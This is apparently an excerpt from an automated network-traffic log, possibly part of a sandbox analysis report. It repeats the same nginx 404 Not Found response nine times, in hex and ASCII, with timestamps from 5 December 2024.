Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:01 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:09 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
